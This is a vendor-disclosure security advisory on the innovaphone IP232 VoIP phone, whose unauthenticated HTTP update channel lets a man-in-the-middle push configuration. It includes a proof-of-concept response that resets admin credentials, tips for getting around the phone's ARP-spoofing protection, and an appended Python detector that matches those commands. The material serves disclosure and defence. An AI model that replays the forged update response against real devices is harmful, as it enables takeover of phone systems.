Advisory ID: SYSS-2019-023
Product: innovaphone IP232
Manufacturer: innovaphone AG
Affected Version(s): 12r2 sr23
Tested Version(s): 12r2 sr23
Vulnerability Type: Missing Authentication for Critical Function (CWE-306)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2019-05-16
Solution Date:
Public Disclosure: 2019-07-03
CVE Reference: Not yet assigned
Author of Advisory: Moritz Abrell (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The innovaphone IP232 is a Voice over IP telephone solution which
provides many communication functionalities, for instance, an
announcement function, password-protected administration via web
browser (HTTPS), simultaneous registration of up to six users, and many
other features.

The manufacturer innovaphone AG describes the product as follows
(see [1]):

"The IP232 IP phone stands for top quality. It belongs to the
innovaphone IP phone design line honoured with the distinguished 'red
dot design award: product design'. The IP232 convinces with its modern
looks and its technological details. The wideband G.722 audio standard
provides optimal voice quality. Standard USB interfaces are perfect for
the integration of headsets or extension modules."

Due to unauthenticated, unencrypted communication between the VoIP phone
IP232 and the update server, an attacker in a man-in-the-middle position
is able to respond to update requests and thus read and change
configuration data, including admin credentials.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The innovaphone IP232 phone sends HTTP GET requests at a defined
interval to the configured update server (default value = 15 minutes).
The update server answers with some configuration lines and other
commands to update the device and back up the configuration file.
If an attacker responds to this request, or routes the request to an
attacker-controlled update server, the phone accepts the configuration
changes, runs the commands, uploads its own configuration file to the
attacker's server, and installs the attacker's boot code and firmware.

The attack also works on similar innovaphone devices.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The phone sends the following HTTP request to the update server:

GET /DRIVE/FLASH/update/update.txt?ver=12r2+sr23+IP232%5B12.5560%5D%2C+Bootcode%5B125560%5D%2C+Hardware%5B1302%5D+ HTTP/1.1
User-Agent: innovaphone-IP232/125560
Host: victim.pbx
Connection: close

When this HTTP request is answered with some code, the device applies
the changes.

An example response for changing the admin credentials to
"attacker/supersecret" is as follows:

HTTP/1.1 200 OK
Date: Mon, 13 May 2019 10:04:41 GMT
Server: innovaphone IP0011 / 12r2 sr23 [12.5560/125560/600]
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 106

config change CMD0 /user attacker,supersecret
config activate
config rem CMD0 /user
config activate
iresetn

To answer an HTTP request of a phone, one has to previously establish a
man-in-the-middle position, for example via ARP spoofing, DNS spoofing,
or DHCP spoofing.

The VoIP phone IP232 has a built-in ARP spoofing prevention option. If
this feature is enabled, updating the ARP cache will be prevented by the
device. However, it is only 'protected' for about 30 seconds. Thus, by
isolating the device from the network for this time, it is still
possible to spoof MAC addresses.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Currently, the manufacturer has no plans to patch this security issue.
The manufacturer recommends migrating to major release v13r1, which
supports an alternative update mechanism.
However, it has to be noted that the vulnerable update mechanism is
still active in the default configuration.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2019-05-16: Vulnerability reported to manufacturer
2019-05-23: Reported vulnerabilities again as the vendor did not respond
            to the first e-mail
2019-06-14: Reported vulnerabilities again as the vendor did not respond
            to the first e-mails
2019-06-14: Response from manufacturer that there are currently no plans
            to fix this security issue
2019-07-02: Public disclosure

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product Web Site for innovaphone IP232
    https://www.innovaphone.com/en/ip-telefonie/ip-telefone/ip232.html
[2] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.

E-Mail: moritz.abrell (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc
Key fingerprint = 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
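
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Detection example (added here; not part of the SySS advisory and not
innovaphone code): because the update poll described under Vulnerability
Details travels in cleartext, a network monitor can review each captured
request/response pair. The sketch assumes a defender-maintained list of
legitimate update servers; the function names, addresses and response
samples are constructed, and the command patterns are the ones visible
in the PoC response.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: the defender maintains the list of legitimate update servers.
TRUSTED_UPDATE_SERVERS = {"192.0.2.10"}  # constructed address

UA_RE = re.compile(r"^User-Agent:\s*innovaphone-", re.I | re.M)
# Command shapes taken from the PoC response in this advisory.
SENSITIVE = [
    (re.compile(r"^config\s+change\s+\S+\s+/user\b"), "/user line changed"),
    (re.compile(r"^config\s+rem\s+\S+\s+/user\b"), "/user line removed"),
    (re.compile(r"^iresetn\b"), "device reset"),
]

def is_update_poll(request):
    """True if a raw HTTP request looks like the phone's periodic update poll."""
    parts = request.split("\n", 1)[0].split()
    if len(parts) < 2 or parts[0] != "GET":
        return False
    query = parse_qs(urlsplit(parts[1]).query)
    return "ver" in query and bool(UA_RE.search(request))

def review_exchange(server_ip, request, response):
    """Return findings for one captured cleartext request/response pair."""
    if not is_update_poll(request):
        return []
    findings = []
    if server_ip not in TRUSTED_UPDATE_SERVERS:
        findings.append("update poll answered by unlisted server " + server_ip)
    body = response.replace("\r\n", "\n").partition("\n\n")[2]
    for line in (raw.strip() for raw in body.splitlines()):
        for pattern, label in SENSITIVE:
            if pattern.search(line):
                findings.append(label + ": " + line)
    return findings

# Request as shown in the advisory; responses and addresses are constructed.
POLL = ("GET /DRIVE/FLASH/update/update.txt?ver=12r2+sr23+IP232%5B12.5560%5D"
        "%2C+Bootcode%5B125560%5D%2C+Hardware%5B1302%5D+ HTTP/1.1\r\n"
        "User-Agent: innovaphone-IP232/125560\r\nHost: victim.pbx\r\n"
        "Connection: close\r\n\r\n")
TAMPERED = ("HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n\r\n"
            "config change CMD0 /user attacker,supersecret\nconfig activate\n"
            "config rem CMD0 /user\nconfig activate\niresetn\n")
EMPTY = "HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"

if __name__ == "__main__":
    for finding in review_exchange("198.51.100.7", POLL, TAMPERED):
        print(finding)
```

A credential-changing response is reported even when it comes from a
listed server, since the phone cannot tell a genuine answer from a
spoofed one on this channel.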